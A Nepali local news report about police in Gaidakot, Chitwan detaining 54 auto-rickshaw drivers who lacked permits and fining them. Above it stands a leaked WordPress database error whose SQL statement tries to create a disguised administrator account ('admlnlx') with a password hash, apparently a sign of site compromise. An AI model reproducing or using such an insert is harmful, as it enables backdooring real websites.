WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B54j6vbsHtwVe.r2JIZeLswQHZOTd90', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 05:21:55', '', 'admlnlx', 'admlnlx')
पवित्रा घिमिरे
चितवन,फागुन ४-
अनुमति पत्र विना अटो रिक्सा चलाउने ५४ जनालाई इलाका प्रहरी कार्यालय गैडाकोटले नियन्त्रणमा लिएको छ । मुख्य राजमार्ग क्षेत्रमा अनुमति विना अटो रिक्सा चल्ने गरेको जनगुनासो वढेपछि प्रहरीले छड्के चेकजाँच गरेको थियो । चालक सँगै अटोलाई समेत इलाका प्रहरी कार्यालयले नियन्त्रणमा लिएको हो ।
राजमार्ग क्षेत्रमा चल्ने अधिकांस अटो रिक्सा चालक सँग अनुमति पत्र नभएको पाइएको इलाका प्रहरी कार्यालय गैडाकोटका प्रहरी निरीक्षक सुभाष हमालले जानकारी दिनुभयो । नियन्त्रणमा लिइएको अटो रिक्सा चालकलाई १ हजार रुपैयाँ जरिवाना लगाइएको छ । उनिहरुलाई अनुमति विना अटो रिक्सा चलाए अझै कडा कार्वाही गर्ने चेतावनी दिएर छाडिएको उहाँले बताउनुभयो ।
सडकमा सवारी साधनको अत्याधिक चाप बढिरहेका बेला प्रहरीले अनुमति पत्र विना सञ्चालनमा रहेका सवारी साधनलाई नियमित रुपमा नियन्त्रणमा लिन थालेको छ । सानो सडकमा सवारी चापका कारण निकै भीडभाड बढ्दै गएको छ । दैनिक रुपमा विभिन्न क्षेत्रमा छडके चेकजाच भैरहेको प्रहरीले जनाएको छ ।